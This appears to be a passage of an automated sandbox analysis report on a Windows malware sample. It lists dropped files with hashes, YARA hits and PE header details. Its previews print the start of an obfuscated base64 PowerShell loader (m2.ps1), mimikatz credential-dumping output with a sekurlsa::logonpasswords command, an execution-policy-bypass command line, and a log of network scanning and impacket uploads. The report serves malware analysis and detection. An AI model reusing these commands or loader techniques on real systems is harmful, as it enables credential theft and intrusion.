                                                              SHA-256:A8561293134F940FF1C95B2BE82B24A80C22B851E8594008B567A2842A60E9AB
                                                              SHA-512:A9DDAF28D99839586B9AC8AD180D74F294092353FD5686E1592119AA4927EBF10FA6723D4AC24DB4A8027432FA04CA506BA2CA495E7DE468B948FDD79042A2E6
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.]E!o3.!o3.!o3.?=.. o3.?=..,o3.?=..#o3.?=..$o3.(...#o3.!o2.Fo3.?=..%o3.?=.. o3.?=.. o3.Rich!o3.........PE..L...y20L...........!.........n......................................................................................P?..J....5..P............................`.......................................4..@............................................text............................... ..`.rdata...?.......@..................@..@.data...h....@.......,..............@....reloc.......`.......:..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\python27.dll
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2640384
                                                              Entropy (8bit):6.7208058935807475
                                                              Encrypted:false
                                                              SSDEEP:49152:XpG1BkE5T3Ezr57DfqPRHfVX8dswLmwbr5oLEdeOPln4MdWHFdtSIqOTDjl+ey3e:s17HfVX6sAmwX98Q4MgHrt7qYZF
                                                              MD5:F5C5C0D5D9E93D6E8CB66B825CD06230
                                                              SHA1:DA7BE79DD502A89CF6F23476E5F661EEBD89342B
                                                              SHA-256:E3EED66221A6552D4B9AE7350B3DC30DE238A6029EFAE060514D2780C02FEDB4
                                                              SHA-512:8A13B15884F8450396B8F18597DFE62F0E13E7AB524D95DE5B7B0497A64E52F26B22F977803280B1916FC2B45C52A92AB501A6FB8AD86970D8326BE72F735279
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#..^g.y.g.y.g.y....~.y.n...l.y.n...i.y.n...e.y.n...l.y.g.x.[.y.n.....y.n...f.y.n...f.y.n...f.y.Richg.y.................PE..L.....UX...........!.....n...........q........................................)......9)...@......................... C!.t|..<,!.x.....(.D.................... (..[.. ................................*!.@............................................text...Zl.......n.................. ..`.rdata...?.......@...r..............@..@.data....B....!..(....!.............@....rsrc...D.....(.......&.............@..@.reloc...e... (..f....&.............@..B................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\pywintypes27.dll
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):110080
                                                              Entropy (8bit):6.570282706653416
                                                              Encrypted:false
                                                              SSDEEP:3072:XJ3S1M+tYU06cwxxKEYLRjM/HRxo1Y7bi0to70fsNOK7dZpZUJP:XxSRtYU0bwxxKEYLRjyUY7bi0q70ENOI
                                                              MD5:F3EF005E60F838EAAA44529DAEEB93AB
                                                              SHA1:0F8730CAEA9F7B16C2E90F6551A90B80B994688F
                                                              SHA-256:241ECBD87410E9B23339D494F9ECA7DDF8083472661989F489FDD7FE0B8776B4
                                                              SHA-512:8C57D5B6A5B44B26FB943B0D5DDD5D80EEAC2488E91F538E361781E727F931717BB3D5A0811AE7C8DD85122E74B08C54C3384FD2FC0DB79E0B0E7FBFC8160D20
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x..k.F.k.F.k.F6$.F.k.F.9.F.k.F.9.F.k.F...F.k.F.9.F.k.F...F.k.F.k.FQk.F.9.F.k.F.9.F.k.F.9.F.k.FRich.k.F........PE..L....dS...........!.............................z..................................................................C...J..............\............................................................*..@............................................text.............................. ..`.rdata.............................@..@.data................|..............@....rsrc...\...........................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\select.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):11776
                                                              Entropy (8bit):5.7370014656327255
                                                              Encrypted:false
                                                              SSDEEP:192:0fF9RB8SglQopt3J8z1H5KPycAXhuUXy+j3XhxeHrc1U56FKc:0fF9RB8SchZ8znhbX/bxxmuT3
                                                              MD5:DCEE0DBCF84CC9F1620F168D8F8F9FD1
                                                              SHA1:9F570FA253C24A8FE56948F4C6E79982D9644A3B
                                                              SHA-256:385E7A3CF5DD7B65590B064E7BC09F901DB7DDC8542396AF6BB60048A30993F0
                                                              SHA-512:5B89FE78E841BD05A7C4A626D9B06AA200F8C7D0EBF3B9124AA4440159636FC20CED725D2FE61DE7BB4DC210060FDDD36F785309A536293455CB863EBFF00E77
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O+..E...E...E..|...E..|...E..|....E..|...E..V...E...D...E..|...E..|...E..|...E.Rich..E.........PE..L...~20L...........!.........................0...............................`.......................................8..H....3..d............................P.......1...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...4....@.......$..............@....reloc.......P.......*..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\unicodedata.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):688128
                                                              Entropy (8bit):5.433599353373704
                                                              Encrypted:false
                                                              SSDEEP:12288:gD3I3AxoMPBt8FpQsVdFiI5mZMPXubUxktwd:gD3uxM8XQsVdXSPAxLd
                                                              MD5:5B44D0BD38C218445DDE8C913736EAAC
                                                              SHA1:DC778E6DC62006A5CCD1F206C3000E32B4439592
                                                              SHA-256:EDEC30653DC56DF03EB40FA97C616950FD593C0B90C2950AF722E66816EB70E9
                                                              SHA-512:3BB53385124C43C7C06F9AFC3CB2D81B1D623E676FEAB31F76C427A37D4B165BAD1EA8267BACC9284C1FF25C2D6BEE0BB584D2EDD774846202694458C6D099E3
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........{\............................................................................Rich....................PE..L...P20L...........!.....,...R.......1.......@......................................................................`X..R...LR..P................................... A..............................0Q..@............@...............................text....+.......,.................. ..`.rdata.......@.......0..............@..@.data....+...`...*...J..............@....reloc..~............t..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\win32api.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):99328
                                                              Entropy (8bit):6.5766707412687975
                                                              Encrypted:false
                                                              SSDEEP:3072:d26TODbjcOlNJvsIxzaAl2OfGXChCVhV3LHhBNIxJ2cUDqtyAtykub:46TOPjlNJ0ozaAl2O+ChCVhVxcUDqLyj
                                                              MD5:4808FC8E377C68AFC58E512EAEB92984
                                                              SHA1:5D30FB56ABD2A4E66108A8E8CD21450A7E29DCC4
                                                              SHA-256:63112ADEBC44D8183FAA148E53CC48DDDA0A9FB11C7D15A1EF5C8B36023F1205
                                                              SHA-512:7C8994A78022499561D69893C67C4F16DCC826BA42BED01BB079324C980946A50463737E7F96F13915AA0A2728FF4555D61C33D7C7375DE69E0D71F9347F66F4
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w.z..b)..b)..b).D.)..b).D.)..b).D.)..b).n.)..b)...)..b)..c)..b).D.)..b).D.)..b).D.)..b)Rich..b)........PE..L......T...........!................<................................................................................g..~....B......................................`................................@..@...............D....B..@....................text............................... ..`.rdata..Nx.......z..................@..@.data........p.......T..............@....reloc..p........ ...d..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\win32event.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):17408
                                                              Entropy (8bit):6.077433206403434
                                                              Encrypted:false
                                                              SSDEEP:384:i6ObLkEVhuSRk78FFm/ThAdbF7EpmK+g50ewm3qrdE2nVb5yvL:SbLkEV4SBFm/ThAdbF7EpmbO5T3qrd1a
                                                              MD5:997B91AB18B0E50A458B6093A77C1F51
                                                              SHA1:8D8F247600BA0210912270F960193FB039E57BA0
                                                              SHA-256:3F2D34661FD5CC1C800C121AD8ED1077AD62888A688FEA23DCF2617ACEED2D7C
                                                              SHA-512:3EE618C1759CCDB357817F50CAB91F3F1D5D5AF3B147539F711508A7DEBE5F57C69072189B9261AF539B101047963F3A233A03517839592F431E2AC1F1AD9AFF
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........YMF.8#..8#..8#..j...8#..j...8#..j...8#..@...8#...X..8#..8"..8#..j...8#..j...8#..j...8#.Rich.8#.........................PE..L......T...........!....."...".......+.......@.......................................................................S..P...LJ..x............................p.......A..............................(I..@............@..`............................text....!.......".................. ..`.rdata.. ....@.......&..............@..@.data........`.......<..............@....reloc.......p.......>..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\win32pipe.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):23040
                                                              Entropy (8bit):6.187314720225589
                                                              Encrypted:false
                                                              SSDEEP:384:0/hOIiDSVujmVnO7aNfnVssjMDcu6Zx56DUgjZ2FDH9cJ:cE/DSYiVnO7SZu6joBQ9c
                                                              MD5:0D4A1785AA8F949CFA2A19278CBE3C81
                                                              SHA1:6E2AFE14BC7D882DA9BF02F9BEA3FA04641626B8
                                                              SHA-256:2EFC1764B23E02B2E91016EA331E68207CB5C2579166CA305A196FE343719D4D
                                                              SHA-512:F358BDACCB3C947AAEBC1F5479DCFD526D8C6D8742369E0EF6CF7EFC4060810469A25109CADE45CD93364B24CF0000A725DEB0AA45F603A210349EE8EE796FCA
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z..B>..>..>...,..<.. ...=.. ...3.. ...:..7...=..>..N.. ...:.. ...?.. ...?..Rich>..........PE..L......T...........!.....0...*......F8.......@.......................................................................Y..N....M..d............................p.......A..............................HL..@............@...............................text............0.................. ..`.rdata.......@.......4..............@..@.data........`.......P..............@....reloc.......p.......R..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\win32wnet.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):24064
                                                              Entropy (8bit):6.151705019809125
                                                              Encrypted:false
                                                              SSDEEP:384:qQRZ5g+l3KQZrpu0SwWWwe8GvNpGrxuERGgeTOaq+k8y14NWdiSPY3hTOt62Di+b:vRZ5g+l3KQZrpJI/bmOJ14c5ANOt75O2
                                                              MD5:BA30A2A5208405C1D8EECE685A9A3ADF
                                                              SHA1:D615160E7689FD1D547681D7B5FBD1ED768D568D
                                                              SHA-256:2611A0C3AC7A2C10316C6532570345EA697D03E74C56E3EB0FEA322B48FC7072
                                                              SHA-512:959010B4D8E4045AE025D7858A25061D34B2D53DDCAA498FF617238CE5AAE82598FC3731478CB60671E1B657C49621FD823333F8EA9714F0999F5D15E8B0C1A8
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................^.W......T......B......R......R.....b..............E......S......P....Rich...........PE..L......T...........!.........0.......5.......@......................................................................PY.. ...|N...............................p..p....A...............................K..@............@...............................text...J,.......................... ..`.rdata..p....@... ...2..............@..@.data...l....`.......R..............@....reloc..~....p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_acvktxbn.fky.psm1
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tiqes1kg.oh2.ps1
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\Desktop\m2.ps1
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):1900379
                                                              Entropy (8bit):5.871053699718625
                                                              Encrypted:false
                                                              SSDEEP:24576:2BALGsEFmEXSomuRSuBYT8DSC7xwsynrH6qVYidlvJcCdTMzbyOOd3A03PRRAA4W:EgEli4D1daHJemXd3A0JGvW
                                                              MD5:7AC4E48CD81B8595AADE2FF6423494E2
                                                              SHA1:85D3A859788029743F1736667AC7CBBAA7A28AF5
                                                              SHA-256:3F28CACE99D826B3FA6ED3030FF14BA77295D47A4B6785A190B7D8BC0F337E41
                                                              SHA-512:72AD9E077A95D525C2A3CFB8350AC0A55F6D3812A63C0A3F47BA6B3E70DFDA44D53D034B5D6829D1182A5B431D856DB85F88AA226807B010F383DF5374DB6633
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: apt_c16_win_wateringhole, Description: Detects code from APT wateringhole, Source: C:\Users\user\Desktop\m2.ps1, Author: @dragonthreatlab
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              Preview: Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ixulW+rvlLy4fnVSLZpWffG9/tEf/u//97e9UZy8+/vjO1tbWx+fr5bQtqmX6e71++p3Xv3Hyi3/j5Hsni1mZt0+K5axYXmw9zc+zddm+zOpskbd5/TpvX9Bvn1WvfvDy6XqxmtT5DL/f+f5vnHCjrd84Sen5nn1j62XVFNzJZ+kOmvHXr9uawH/v+/r3D94++X1+gjBdrekNdDD6jZM+oA4SBLCLxij1ett1vV0V7XTu92Veeo9+Pq8I40nVNu/VkX3rPXo6WTdttSByLLLlxmExETskxDu/cXIHvRHUbbSZtl9Uszzd/sm8bgBjD1/+xgm/8fz1t59+9fkzgvuLFWrIAKYzf3I3TPAo/YL6z9qqvqY/uYe2XucGSh9ti/rLl6+ffvv3evr66ZPrlnB6/TRv7u1Zog13ufvNdKm9me9v6nUv0ut5Vja36fYZSd2rvF3XyzfXq9zr9Lad37tF5+n3zpbtvb3ekOtqejZ7j4Hu36qvAfpSZ4EwD3dz/wO6OT0+++rZt1/Lp3fkh3C4/P7MaLnnn5OWeyUfKrdbIE+/8+17e9+mrl/kV9tfTn46n7bp6+umzRdj+cuH6N6qFlkB/L93vFrJH99/9OhkXdf5spW/u29cL7NFMT1umnwxKa+jHb7Kz8ucUR6bdiDj1oPvvPjqBx0A/JkO2nZivnyyLspZXhuCCkJj0unFMu/A2YphNyKS91A
                                                              C:\Users\user\Desktop\mkatz.ini
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                              Category:dropped
                                                              Size (bytes):4201
                                                              Entropy (8bit):5.0220380193295036
                                                              Encrypted:false
                                                              SSDEEP:96:O7wHMPJMFHCMF+EifNlHCNl+z+nnnHxqnnHCnl+orIonnHwvInnnHdo6uyOdnnHd:+aMPJMFiMF+EsNliNl+zQnnonninl+oi
                                                              MD5:FA36E2EE6C40261F3339ED6A3FCEE891
                                                              SHA1:BF6A6456B5F969E1A308D680826AE972A4FCE521
                                                              SHA-256:C10540146916A7B929E8693C483E91C5E7FD80392906736B0436D6881228EFA1
                                                              SHA-512:2D425DF26E80CAD109AF7B3F9AF436280D3A5A5B1C58DD2DD566773A39DE3131E5C9EF1CDAA026F3DA7BD9981FA273D773BC36160B3C33F72D9F1AF7DFA05638
                                                              Malicious:false
                                                              Yara Hits:
                                                              • Rule: Mimikatz_Logfile, Description: Detects a log file generated by malicious hack tool mimikatz, Source: C:\Users\user\Desktop\mkatz.ini, Author: Florian Roth
                                                              Preview: .. .#####. mimikatz 2.1.1 (x64) built on Aug 3 2018 17:05:14 - lil!.. .## ^ ##. "A La Vie, A L'Amour" - (oe.eo).. ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ).. ## \ / ## > http://blog.gentilkiwi.com/mimikatz.. '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ).. '#####' > http://pingcastle.com / http://mysmartlogon.com ***/....mimikatz(powershell) # sekurlsa::logonpasswords....Authentication Id : 0 ; 102590 (00000000:000190be)..Session : Interactive from 1..User Name : user..Domain : computer..Logon Server : computer..Logon Time : 9/30/2020 8:02:40 AM..SID : S-1-5-21-3853321935-2125563209-4053062332-1002...msv :.... [00000003] Primary... * Username : user... * Domain : computer... * NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0... * SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709...tspkg :....wdigest :.... * Username : user... * Domai
                                                              C:\Users\user\Documents\20210405\PowerShell_transcript.830021.w56wNSku.20210405112311.txt
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators
                                                              Category:dropped
                                                              Size (bytes):5042
                                                              Entropy (8bit):5.155944530171988
                                                              Encrypted:false
                                                              SSDEEP:96:BZMhKN74qDo1Z4JCBnlmLnq0nq53oLoK0oK74ALGARBLGA0GK6LEDLGAqXNEmLGS:79WnlAnq0nq5WoK0oK7VGArGA0GK6LEC
                                                              MD5:361400D376674D699C29CC97BCE44853
                                                              SHA1:1F76E905BCA5952820427F1C6BFE6E17556A4ED4
                                                              SHA-256:2CDD8FFD0F7FCA3AD3154F167C264BF99DF8AC3073A0973B84398D83F7D0D3E8
                                                              SHA-512:97A34D034B3D329AEF5EE5E3CFFEC944EB876E19A66273E14C95991AA316DF654BB0D24B8082EE5769F6B48E21A2E4550ACE99897BAF813E812182D6655BD91D
                                                              Malicious:false
                                                              Yara Hits:
                                                              • Rule: Mimikatz_Logfile, Description: Detects a log file generated by malicious hack tool mimikatz, Source: C:\Users\user\Documents\20210405\PowerShell_transcript.830021.w56wNSku.20210405112311.txt, Author: Florian Roth
                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210405112312..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 830021 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass import-module C:\Users\user\Desktop\m2.ps1..Process ID: 6964..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210405112312..**********************..PS>import-module C:\Users\user\Desktop\m2.ps1... .#####. mimikatz 2.1.1 (x64) built on Aug 3 2018 17:05:14 - lil!. .## ^ ##. "A La Vie, A L'Amour" - (oe.eo). ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ). ## \ / ## > h
                                                              \Device\ConDrv
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):363
                                                              Entropy (8bit):5.1610162737161644
                                                              Encrypted:false
                                                              SSDEEP:6:kfl3Fy7tbOhbVnKXVbUIbUybWyErAgIT8FcfW12ExD8FcUy1sb:k93FibOvnKFbfbnbWy1Yeu1jxoeUy1sb
                                                              MD5:9AE9ADC3BA89E853DC6E1A6FF142E58F
                                                              SHA1:B70D41D74A431484182BDB924FF1CF0C2550B0DE
                                                              SHA-256:31EF3745545E8669B1EC525B0E0991AD7B4945F61BCC4B66D067DBD49977E11F
                                                              SHA-512:BA7769469BB99832497267B671EB02590A2EC45124DDD469FDBA2D78C9E1506BE14AECFBA019C67911168DB41C5197DC7B5BFEB7585829413081B2D56DDB041C
                                                              Malicious:false
                                                              Preview: reload mimi..nobody logon..mimi over..start scan..192.168.0.1/24..192.168.1.1/24..192.168.2.1/24..exp IP:192.168.2.1exp IP:192.168.2.3....CRITICAL:impacket:Authenticated as Guest. Aborting..CRITICAL:impacket:Error uploading file temp\svchost.exe, aborting.......aaa..CRITICAL:impacket:Error uploading file windows\temp\svchost.exe, aborting.......192.168.3.1/24..

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (console) Intel 80386, for MS Windows
                                                              Entropy (8bit):7.993490491074095
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:UlJpFEz1Cj.exe
                                                              File size:6967362
                                                              MD5:dde978f310f46d0556ea774da695b698
                                                              SHA1:e22548f91b17d4f4fc38dfe1b90ea71b1a2bfed1
                                                              SHA256:0bc20b98a473491219885cc68d0f0944563260ae12add1b1199e64255e92c40d
                                                              SHA512:c5c519c7102eaae7acc0692a3541fcb6d504fdaf9a333d2c8b170ff7222b01bd5507ecc9c5c7872c91efa8958cacf03008c58a30771f13c0d7857f20a68c8b5c
                                                              SSDEEP:196608:eAqjTpnhXlmyWCZNulPKQ8hY/Bkr/fOIT/+VdlBFKazR:kfauN/HYOSIT/EVF9d
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@..b.Q.b.Q.b.Q...Q.b.Q...Q.b.Q...Q.b.Q.<-P.b.Q.<+P.b.Q.<*P.b.Q{..Q.b.Q.b/Q.b.Q4<*P.b.Q4<.Q.b.Q4<,P.b.QRich.b.Q...............

                                                              File Icon

                                                              Icon Hash:ae9ebc4c8ce0e8f8

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x40779a
                                                              Entrypoint Section:.text
                                                              Digitally signed:true
                                                              Imagebase:0x400000
                                                              Subsystem:windows cui
                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                              DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                              Time Stamp:0x5B8E99C5 [Tue Sep 4 14:42:13 2018 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:5
                                                              OS Version Minor:1
                                                              File Version Major:5
                                                              File Version Minor:1
                                                              Subsystem Version Major:5
                                                              Subsystem Version Minor:1
                                                              Import Hash:4df47bd79d7fe79953651a03293f0e8f

                                                              Authenticode Signature

                                                              Signature Valid:
                                                              Signature Issuer:
                                                              Signature Validation Error:
                                                              Error Number:
                                                              Not Before, Not After
                                                                Subject Chain
                                                                  Version:
                                                                  Thumbprint MD5:
                                                                  Thumbprint SHA-1:
                                                                  Thumbprint SHA-256:
                                                                  Serial:
                                                                  Instruction
                                                                  call 00007F7A58E28734h
                                                                  jmp 00007F7A58E2807Ch
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  push edi
                                                                  push esi
                                                                  push ebx
                                                                  xor edi, edi
                                                                  mov eax, dword ptr [esp+14h]
                                                                  or eax, eax
                                                                  jnl 00007F7A58E28206h
                                                                  inc edi
                                                                  mov edx, dword ptr [esp+10h]
                                                                  neg eax
                                                                  neg edx
                                                                  sbb eax, 00000000h
                                                                  mov dword ptr [esp+14h], eax
                                                                  mov dword ptr [esp+10h], edx
                                                                  mov eax, dword ptr [esp+1Ch]
                                                                  or eax, eax
                                                                  jnl 00007F7A58E28206h
                                                                  inc edi
                                                                  mov edx, dword ptr [esp+18h]
                                                                  neg eax
                                                                  neg edx
                                                                  sbb eax, 00000000h
                                                                  mov dword ptr [esp+1Ch], eax
                                                                  mov dword ptr [esp+18h], edx
                                                                  or eax, eax
                                                                  jne 00007F7A58E2820Ah
                                                                  mov ecx, dword ptr [esp+18h]
                                                                  mov eax, dword ptr [esp+14h]
                                                                  xor edx, edx
                                                                  div ecx
                                                                  mov ebx, eax
                                                                  mov eax, dword ptr [esp+10h]
                                                                  div ecx
                                                                  mov edx, ebx
                                                                  jmp 00007F7A58E28233h
                                                                  mov ebx, eax
                                                                  mov ecx, dword ptr [esp+18h]
                                                                  mov edx, dword ptr [esp+14h]
                                                                  mov eax, dword ptr [esp+10h]
                                                                  shr ebx, 1
                                                                  rcr ecx, 1
                                                                  shr edx, 1
                                                                  rcr eax, 1
                                                                  or ebx, ebx
                                                                  jne 00007F7A58E281E6h
                                                                  div ecx
                                                                  mov esi, eax
                                                                  mul dword ptr [esp+1Ch]
                                                                  mov ecx, eax
                                                                  mov eax, dword ptr [esp+18h]
                                                                  mul esi
                                                                  add edx, ecx
                                                                  jc 00007F7A58E28200h
                                                                  cmp edx, dword ptr [esp+14h]
                                                                  jnbe 00007F7A58E281FAh
                                                                  jc 00007F7A58E281F9h
                                                                  cmp eax, dword ptr [esp+10h]
                                                                  jbe 00007F7A58E281F3h
                                                                  dec esi
                                                                  xor edx, edx
                                                                  mov eax, esi
                                                                  dec edi
                                                                  jne 00007F7A58E281F9h
                                                                  neg edx
                                                                  neg eax
                                                                  sbb edx, 00000000h
                                                                  pop ebx
                                                                  pop esi
                                                                  pop edi
                                                                  retn 0010h
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push 00000000h
                                                                  call dword ptr [00000058h]
                                                                  Programming Language:
                                                                  • [RES] VS2015 UPD3 build 24213
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2b82c0x3c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3d0000xea38.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x6a40300xeb0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x4c0000x17b8.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x2ae400x1c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ae600x40.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x210000x180.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x1f2240x1f400False0.569703125MPEG-4 LOAS6.65268604007IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x210000xb0ec0xb200False0.562368328652data6.10090706211IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x2d0000xe6800xa00False0.149609375data1.94097514115IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
